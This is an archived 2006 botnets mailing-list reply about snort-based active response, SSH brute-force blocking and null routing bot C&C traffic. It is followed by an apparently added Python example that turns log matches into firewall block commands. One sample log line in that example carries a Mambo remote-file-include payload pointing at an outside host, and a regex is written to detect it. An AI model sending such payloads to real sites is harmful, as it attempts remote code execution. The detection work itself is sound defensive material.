To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
On Tue, 13 Jun 2006, dan wrote:

> I was curious how many people on the list are using active response 
> systems for their IDS installations. If so, which ones?

since you said that you're using snort, i don't know if you have linux 
firewalling enabled or not, but if so:

        http://www.stearns.org/snort2iptables/

if you're using openbsd+pf, check out snort2c:

        http://snort2c.sourceforge.net/

or snort2pf:

        http://www.thinknerd.org/~ssc/wiki/doku.php?id=snort2pf

there are also plugins for Checkpoint SAM integration (snortsam). and also 
snort-inline (in IPS mode).

in short, lots of ways to block known offending hosts with snort. just 
make sure that your ruleset is up to snuff.

you may also want to mix it with something to watch your SSH logs to track 
brute forcing attempts (and insert the appropriate FW rules) and also your 
apache access attempts (i.e. to stop those mambo attempts).

also, if you're worried about bots getting OUT of your network once 
they've attacked, you can look at things like null routing if you can get 
a list of known botnets and have them updated frequently enough, or you 
can also firewall the destination hosts. this would block the bot from 
successfully getting to the C&C server; it won't block the bot's 
propagation attempts. clearly, keeping up to date on patches and auditing 
for NULL or weak passwords will stop most bot propagations; it won't stop 
the Trojan horse infection vector, though. keep your AV up to date and 
you'll track most malware (but, i do have to admit, most of the bots i 
catch and analyze are poorly detected by AV, if at all).

hope this helps,

________
jose nazario, ph.d.                 [EMAIL PROTECTED]
http://monkey.org/~jose/            http://monkey.org/~jose/secnews.html
                                    http://www.wormblog.com/
_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
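The "watch your SSH logs ... and insert the appropriate FW rules" advice in the reply above, worked through as an added example. This is not code from the post or from any of the tools it links to (snort2iptables, snort2c, snort2pf, snortsam). It parses constructed OpenSSH and Apache log lines, counts failed logins and Mambo-style web probes per source address inside a sliding window, and, once a threshold is crossed, returns the iptables and pf commands that would block the host (and an iproute2 blackhole route for the null-routing idea). Commands are returned as strings, never run. Assumptions: the pf table name `badhosts` must already be declared in pf.conf; the `mosConfig_absolute_path=` / `/mambo/` pattern is a stand-in chosen for the example, not a vetted Mambo signature; syslog lines carry no year, so 2006 is supplied.

```python
"""Added example (not from the list post): turn sshd failures and Mambo-style
web probes into firewall block commands, per source IP, within a time window."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH "Failed password" lines, with or without "invalid user".
SSH_FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)
# Apache common/combined log: client IP, then timestamp and request line.
APACHE_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"'
)
# Assumed Mambo probe pattern for this example only (remote-file-include style
# mosConfig_absolute_path parameter, or a /mambo/ path); not a vetted signature.
MAMBO_RE = re.compile(r"mosConfig_absolute_path=|/mambo/", re.IGNORECASE)


def parse_ssh_failure(line, year=2006):
    """Return (timestamp, source_ip) for a failed-login line, else None."""
    m = SSH_FAIL_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies one (assumption: 2006).
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return ts, m.group("ip")


def parse_mambo_probe(line):
    """Return (timestamp, source_ip) for an Apache line whose request matches MAMBO_RE."""
    m = APACHE_RE.match(line)
    if not m or not MAMBO_RE.search(m.group("req")):
        return None
    # Drop the offset so web and ssh timestamps are both naive and comparable.
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
    return ts, m.group("ip")


class Blocker:
    """Counts offending events per source IP inside a sliding window."""

    def __init__(self, ssh_threshold=5, web_threshold=1, window_seconds=600,
                 whitelist=("127.0.0.1",)):
        self.ssh_threshold = ssh_threshold
        self.web_threshold = web_threshold
        self.window = timedelta(seconds=window_seconds)
        self.whitelist = set(whitelist)   # never block these (e.g. your admin host)
        self.ssh_events = defaultdict(list)
        self.web_events = defaultdict(list)
        self.blocked = {}                 # ip -> reason

    def _record(self, events, ts, ip, threshold):
        hits = events[ip] + [ts]
        # keep only events still inside the window relative to the newest one
        events[ip] = hits = [t for t in hits if ts - t <= self.window]
        return len(hits) >= threshold

    def feed(self, line):
        """Consume one log line; return the IP if it has just become blocked."""
        parsed = parse_ssh_failure(line)
        if parsed:
            events, threshold, reason = self.ssh_events, self.ssh_threshold, "ssh brute force"
        else:
            parsed = parse_mambo_probe(line)
            if not parsed:
                return None
            events, threshold, reason = self.web_events, self.web_threshold, "mambo probe"
        ts, ip = parsed
        if ip in self.whitelist or ip in self.blocked:
            return None
        if self._record(events, ts, ip, threshold):
            self.blocked[ip] = reason
            return ip
        return None


def firewall_commands(ip, pf_table="badhosts"):
    """Block commands for the two firewalls named in the post (assumption: the
    pf table exists in pf.conf and is referenced by a block rule)."""
    return {"iptables": f"iptables -I INPUT -s {ip} -j DROP",
            "pf": f"pfctl -t {pf_table} -T add {ip}"}


def null_route_command(cidr):
    """iproute2 blackhole route for an outbound C&C destination."""
    return f"ip route add blackhole {cidr}"


# Constructed sample lines (not real logs); documentation address ranges.
SAMPLE_LINES = [
    "Jun 13 10:00:01 host sshd[2001]: Failed password for root from 198.51.100.7 port 40001 ssh2",
    "Jun 13 10:00:02 host sshd[2002]: Failed password for invalid user admin from 198.51.100.7 port 40002 ssh2",
    "Jun 13 10:00:03 host sshd[2003]: Failed password for root from 198.51.100.7 port 40003 ssh2",
    "Jun 13 10:00:04 host sshd[2004]: Failed password for root from 198.51.100.7 port 40004 ssh2",
    "Jun 13 10:00:05 host sshd[2005]: Accepted publickey for jose from 198.51.100.20 port 40005 ssh2",
    "Jun 13 10:00:06 host sshd[2006]: Failed password for root from 198.51.100.7 port 40006 ssh2",
    '203.0.113.9 - - [13/Jun/2006:10:01:00 +0000] "GET /index.php?option=com_content&mosConfig_absolute_path=http://203.0.113.99/x.txt? HTTP/1.0" 404 215',
    '198.51.100.20 - - [13/Jun/2006:10:01:05 +0000] "GET /index.php HTTP/1.1" 200 1024',
]


def run(lines, blocker=None):
    """Feed lines through a Blocker; return {ip: commands} for newly blocked hosts."""
    blocker = blocker or Blocker()
    actions = {}
    for line in lines:
        ip = blocker.feed(line)
        if ip:
            actions[ip] = firewall_commands(ip)
    return actions


if __name__ == "__main__":
    for ip, cmds in run(SAMPLE_LINES).items():
        print(ip, "->", cmds["iptables"], "|", cmds["pf"])
```

In production the parsed timestamps come from a tailed log, the whitelist holds your own management hosts, and the commands are executed with a matching expiry (an unbounded DROP list fills up and eventually locks out a legitimate address behind a NAT).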